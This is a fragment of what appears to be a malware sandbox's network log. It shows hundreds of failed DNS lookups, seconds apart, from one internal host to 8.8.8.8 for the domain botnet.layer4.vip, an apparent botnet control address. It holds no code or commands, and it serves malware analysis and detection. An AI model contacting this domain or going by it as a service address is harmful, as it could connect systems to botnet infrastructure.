                                  Apr 9, 2023 03:31:31.215051889 CEST8.8.8.8192.168.2.230x36b1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.230899096 CEST8.8.8.8192.168.2.230x36b1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.334923983 CEST8.8.8.8192.168.2.230x4a60Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.455322981 CEST8.8.8.8192.168.2.230x86dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.553445101 CEST8.8.8.8192.168.2.230xaf7aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.617789030 CEST8.8.8.8192.168.2.230x55adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.658035040 CEST8.8.8.8192.168.2.230x55adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.682657957 CEST8.8.8.8192.168.2.230x55adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.723462105 CEST8.8.8.8192.168.2.230x6cd8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.772167921 CEST8.8.8.8192.168.2.230x6cd8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.788140059 CEST8.8.8.8192.168.2.230x6cd8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.804188967 CEST8.8.8.8192.168.2.230x54a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.844268084 CEST8.8.8.8192.168.2.230x54a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.964987040 CEST8.8.8.8192.168.2.230xb75dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.012247086 CEST8.8.8.8192.168.2.230x93a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.028083086 CEST8.8.8.8192.168.2.230x93a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.067967892 CEST8.8.8.8192.168.2.230x93a4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.122991085 CEST8.8.8.8192.168.2.230xf33eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.162854910 CEST8.8.8.8192.168.2.230xf33eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.242775917 CEST8.8.8.8192.168.2.230x15b4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.274322987 CEST8.8.8.8192.168.2.230x48f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.345675945 CEST8.8.8.8192.168.2.230x48f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.385603905 CEST8.8.8.8192.168.2.230x7850Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.401501894 CEST8.8.8.8192.168.2.230x7850Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.425952911 CEST8.8.8.8192.168.2.230x7850Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.457705021 CEST8.8.8.8192.168.2.230x579dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.481864929 CEST8.8.8.8192.168.2.230x579dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.497874022 CEST8.8.8.8192.168.2.230x579dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.544759989 CEST8.8.8.8192.168.2.230x9ebaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.560429096 CEST8.8.8.8192.168.2.230x9ebaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.633409023 CEST8.8.8.8192.168.2.230x9ebaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.657957077 CEST8.8.8.8192.168.2.230x2751Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.698466063 CEST8.8.8.8192.168.2.230x2751Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.722809076 CEST8.8.8.8192.168.2.230x2751Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.762955904 CEST8.8.8.8192.168.2.230x80dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.779154062 CEST8.8.8.8192.168.2.230x80dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.811227083 CEST8.8.8.8192.168.2.230x80dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.835784912 CEST8.8.8.8192.168.2.230x80dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.860496998 CEST8.8.8.8192.168.2.230xdd37Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.907957077 CEST8.8.8.8192.168.2.230xdd37Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.989542007 CEST8.8.8.8192.168.2.230xce22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.030250072 CEST8.8.8.8192.168.2.230xce22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.046262026 CEST8.8.8.8192.168.2.230xbf7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.061943054 CEST8.8.8.8192.168.2.230xbf7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.093190908 CEST8.8.8.8192.168.2.230xbf7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.109215021 CEST8.8.8.8192.168.2.230xbf7bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.125086069 CEST8.8.8.8192.168.2.230xd307Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.174113989 CEST8.8.8.8192.168.2.230xd307Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.222067118 CEST8.8.8.8192.168.2.230xcb0aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.237791061 CEST8.8.8.8192.168.2.230xcb0aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.301110029 CEST8.8.8.8192.168.2.230x12bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.317015886 CEST8.8.8.8192.168.2.230x12bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.365036011 CEST8.8.8.8192.168.2.230x12bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.413613081 CEST8.8.8.8192.168.2.230x2f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.453816891 CEST8.8.8.8192.168.2.230x2f5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.564891100 CEST8.8.8.8192.168.2.230xc40fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.652712107 CEST8.8.8.8192.168.2.230x31fdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.700037956 CEST8.8.8.8192.168.2.230x4841Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.749628067 CEST8.8.8.8192.168.2.230x4841Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.862977028 CEST8.8.8.8192.168.2.230x4238Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.935075998 CEST8.8.8.8192.168.2.230x247eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.983521938 CEST8.8.8.8192.168.2.230x247eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.026767015 CEST8.8.8.8192.168.2.230x7f49Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.069360971 CEST8.8.8.8192.168.2.230x7f49Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.125281096 CEST8.8.8.8192.168.2.230x6214Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.140933990 CEST8.8.8.8192.168.2.230x6214Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.165235043 CEST8.8.8.8192.168.2.230x6214Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.214518070 CEST8.8.8.8192.168.2.230x6214Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.312777042 CEST8.8.8.8192.168.2.230x6c09Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.337426901 CEST8.8.8.8192.168.2.230x6c09Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.356296062 CEST8.8.8.8192.168.2.230x7464Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.372033119 CEST8.8.8.8192.168.2.230x7464Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.412026882 CEST8.8.8.8192.168.2.230x7464Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.427680016 CEST8.8.8.8192.168.2.230x7464Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.483057022 CEST8.8.8.8192.168.2.230x5164Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.650548935 CEST8.8.8.8192.168.2.230xd6e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.763747931 CEST8.8.8.8192.168.2.230x681bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.787934065 CEST8.8.8.8192.168.2.230x681bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.819490910 CEST8.8.8.8192.168.2.230x681bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.843744040 CEST8.8.8.8192.168.2.230x681bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.883625984 CEST8.8.8.8192.168.2.230xf6f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.908042908 CEST8.8.8.8192.168.2.230xf6f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.939692974 CEST8.8.8.8192.168.2.230xf6f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.004061937 CEST8.8.8.8192.168.2.230x41beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.020088911 CEST8.8.8.8192.168.2.230x41beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.036168098 CEST8.8.8.8192.168.2.230x41beName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.085007906 CEST8.8.8.8192.168.2.230x191bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.125160933 CEST8.8.8.8192.168.2.230x191bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.213987112 CEST8.8.8.8192.168.2.230xdf71Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.245321989 CEST8.8.8.8192.168.2.230xdf71Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.285145044 CEST8.8.8.8192.168.2.230x5941Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.300724983 CEST8.8.8.8192.168.2.230x5941Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.331792116 CEST8.8.8.8192.168.2.230x5941Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.348027945 CEST8.8.8.8192.168.2.230xc040Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.379858017 CEST8.8.8.8192.168.2.230xc040Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.499947071 CEST8.8.8.8192.168.2.230x37d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.524105072 CEST8.8.8.8192.168.2.230x37d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.548388004 CEST8.8.8.8192.168.2.230xfe9fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.564006090 CEST8.8.8.8192.168.2.230xfe9fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.628355980 CEST8.8.8.8192.168.2.230xfe9fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.643937111 CEST8.8.8.8192.168.2.230xb4c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.668070078 CEST8.8.8.8192.168.2.230xb4c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.708137035 CEST8.8.8.8192.168.2.230xb4c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.757603884 CEST8.8.8.8192.168.2.230x73ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.853030920 CEST8.8.8.8192.168.2.230x4addName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.902024031 CEST8.8.8.8192.168.2.230x4addName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.942115068 CEST8.8.8.8192.168.2.230x4addName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.966533899 CEST8.8.8.8192.168.2.230x1f19Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.105807066 CEST8.8.8.8192.168.2.230x3937Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.130332947 CEST8.8.8.8192.168.2.230x3937Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.217947960 CEST8.8.8.8192.168.2.230xec79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.233824015 CEST8.8.8.8192.168.2.230xec79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.265285015 CEST8.8.8.8192.168.2.230x5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.345412016 CEST8.8.8.8192.168.2.230x5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.385740995 CEST8.8.8.8192.168.2.230xea4fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.425319910 CEST8.8.8.8192.168.2.230xea4fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.440886974 CEST8.8.8.8192.168.2.230xea4fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.513892889 CEST8.8.8.8192.168.2.230x60b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.570130110 CEST8.8.8.8192.168.2.230xccd9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.586061954 CEST8.8.8.8192.168.2.230xccd9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.610193968 CEST8.8.8.8192.168.2.230xccd9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.634468079 CEST8.8.8.8192.168.2.230xccd9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.650311947 CEST8.8.8.8192.168.2.230xccd9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.666194916 CEST8.8.8.8192.168.2.230xb23bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.682506084 CEST8.8.8.8192.168.2.230xb23bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.706887007 CEST8.8.8.8192.168.2.230xb23bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.733762026 CEST8.8.8.8192.168.2.230xb23bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.750052929 CEST8.8.8.8192.168.2.230xb23bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.774821043 CEST8.8.8.8192.168.2.230x8d10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.790834904 CEST8.8.8.8192.168.2.230x8d10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.806730032 CEST8.8.8.8192.168.2.230x8d10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.822597027 CEST8.8.8.8192.168.2.230x8d10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.872353077 CEST8.8.8.8192.168.2.230x370aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.896980047 CEST8.8.8.8192.168.2.230x370aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.913197041 CEST8.8.8.8192.168.2.230x370aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:36.938163042 CEST8.8.8.8192.168.2.230x370aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.019757032 CEST8.8.8.8192.168.2.230x9ac3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.060187101 CEST8.8.8.8192.168.2.230x9ac3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.075885057 CEST8.8.8.8192.168.2.230xa22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.100495100 CEST8.8.8.8192.168.2.230xa22Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.198116064 CEST8.8.8.8192.168.2.230x2590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.262753010 CEST8.8.8.8192.168.2.230x2590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.278435946 CEST8.8.8.8192.168.2.230x2590Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.294217110 CEST8.8.8.8192.168.2.230xecedName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.318639040 CEST8.8.8.8192.168.2.230xecedName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.383296013 CEST8.8.8.8192.168.2.230xecedName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.487490892 CEST8.8.8.8192.168.2.230xd52dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.543863058 CEST8.8.8.8192.168.2.230x7f0aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.559853077 CEST8.8.8.8192.168.2.230x7f0aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.584207058 CEST8.8.8.8192.168.2.230x7f0aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.608562946 CEST8.8.8.8192.168.2.230x3d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.633028030 CEST8.8.8.8192.168.2.230x3d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.657553911 CEST8.8.8.8192.168.2.230x3d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.682085991 CEST8.8.8.8192.168.2.230x3d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.697671890 CEST8.8.8.8192.168.2.230x3d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.762353897 CEST8.8.8.8192.168.2.230xd24fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.810969114 CEST8.8.8.8192.168.2.230xd24fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.883162022 CEST8.8.8.8192.168.2.230x4f90Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.907921076 CEST8.8.8.8192.168.2.230x4f90Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.923911095 CEST8.8.8.8192.168.2.230x4f90Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.963922977 CEST8.8.8.8192.168.2.230x73ffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:37.979827881 CEST8.8.8.8192.168.2.230x73ffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.011764050 CEST8.8.8.8192.168.2.230x73ffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.027420998 CEST8.8.8.8192.168.2.230x442cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.043282032 CEST8.8.8.8192.168.2.230x442cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.116303921 CEST8.8.8.8192.168.2.230x442cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.132709026 CEST8.8.8.8192.168.2.230xc9d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.164247990 CEST8.8.8.8192.168.2.230xc9d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.203840971 CEST8.8.8.8192.168.2.230xc9d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.228224039 CEST8.8.8.8192.168.2.230xb0dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.244051933 CEST8.8.8.8192.168.2.230xb0dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.316780090 CEST8.8.8.8192.168.2.230xb0dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.340939999 CEST8.8.8.8192.168.2.230xf72bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.364969015 CEST8.8.8.8192.168.2.230xf72bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.413959980 CEST8.8.8.8192.168.2.230xf72bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.429936886 CEST8.8.8.8192.168.2.230xf72bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.519057035 CEST8.8.8.8192.168.2.230x1ab7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.591784954 CEST8.8.8.8192.168.2.230x4222Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.647943020 CEST8.8.8.8192.168.2.230x4222Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.721246004 CEST8.8.8.8192.168.2.230x22b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.745872021 CEST8.8.8.8192.168.2.230x22b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.834140062 CEST8.8.8.8192.168.2.230x2ae4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.850107908 CEST8.8.8.8192.168.2.230x2ae4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.890175104 CEST8.8.8.8192.168.2.230x56ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.905590057 CEST8.8.8.8192.168.2.230x56ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:38.945363045 CEST8.8.8.8192.168.2.230x56ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
